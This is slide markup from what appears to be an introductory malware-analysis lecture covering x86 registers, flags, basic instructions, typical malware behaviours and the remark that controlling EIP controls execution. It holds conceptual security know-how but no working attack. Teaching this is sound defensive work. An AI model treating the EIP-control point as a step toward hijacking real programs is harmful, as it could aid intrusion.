                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="4740876"/>
            <a:ext cx="1519881" cy="792088"/>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2" name="Google Shape;792;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="4884892"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="793" name="Google Shape;793;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569922" y="4884892"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0001</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"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sp>
        <p:nvSpPr>
          <p:cNvPr id="794" name="Google Shape;794;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6297358" y="4869160"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1111</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="795" name="Google Shape;795;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022675" y="4886633"/>
            <a:ext cx="72531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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0101</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="796" name="Google Shape;796;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364486" y="4740876"/>
            <a:ext cx="1519881" cy="792088"/>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7" name="Google Shape;797;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084168" y="2780928"/>
            <a:ext cx="432048" cy="432048"/>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8" name="Google Shape;798;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364088" y="4293096"/>
            <a:ext cx="360040" cy="360040"/>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9" name="Google Shape;799;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842655" y="4237755"/>
            <a:ext cx="360040" cy="360040"/>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0" name="Google Shape;800;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653397" y="3623775"/>
            <a:ext cx="8130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16 bits</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="801" name="Google Shape;801;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678958" y="5025132"/>
            <a:ext cx="6960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8 bits</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="802" name="Google Shape;802;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4374982" y="1385736"/>
            <a:ext cx="5476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EAX</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="803" name="Google Shape;803;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6565044" y="2987660"/>
            <a:ext cx="4379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AX</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Google Shape;804;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="4417775"/>
            <a:ext cx="4619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AH</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7202695" y="4417775"/>
            <a:ext cx="4154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AL</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk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79"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="812" name="Google Shape;812;p79"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Flags</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ZF: zero flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SF: sign flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CF: carry flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>TF: trap flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>OF: overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>…..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Instruction Pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>EIP: contains the memory address of the next instruction to be executed -&gt; tells CPU what to do next</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="813" name="Google Shape;813;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995937" y="1772816"/>
            <a:ext cx="4896544" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FDE9D8"/>
          </a:solid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i="1" lang="en-GB" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>When EIP is corrupted, the CPU will not be able to fetch legitimate code  to execute,  therefore the program  running at the time will likely crash. When you control EIP, you can control what is executed by the CPU.</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8"/>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Malware behaviour</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p8"/>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Malware behaviour are usually to</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Delete crucial files on a computer to render it unusable without a recovery process.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Log every keyboard input to see what the users type.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Steal personal or sensitive information or files from a computer.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Use a computer’s resources for the purpose of the malware, e.g. send spam emails, DDoS another system, or brute-force encryption keys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80"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;p80"/>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Simple instructions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="820" name="Google Shape;820;p80"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="1772816"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2232250"/>
                <a:gridCol w="2160250"/>
              </a:tblGrid>
              <a:tr h="825575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, ebx</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t> eax, 0x40</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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481225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t> [0x4037c4]</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, [ebx]</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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447125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>mov eax, [ebx+esi*4]</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>lea eax, [ebx+8]</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>sub eax, 0x10</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>add eax, ebx</a:t>
                      </a:r>
                      <a:endParaRPr sz="22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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="821" name="Google Shape;821;p80"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644008" y="1772816"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1584175"/>
                <a:gridCol w="2663925"/>
              </a:tblGrid>
              <a:tr h="792100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
                          <a:cs typeface="Teko"/>
                          <a:sym typeface="Teko"/>
                        </a:rPr>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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rPr lang="en-GB" sz="2000"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="485425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200">
                          <a:latin typeface="Teko"/>
                          <a:ea typeface="Teko"/>
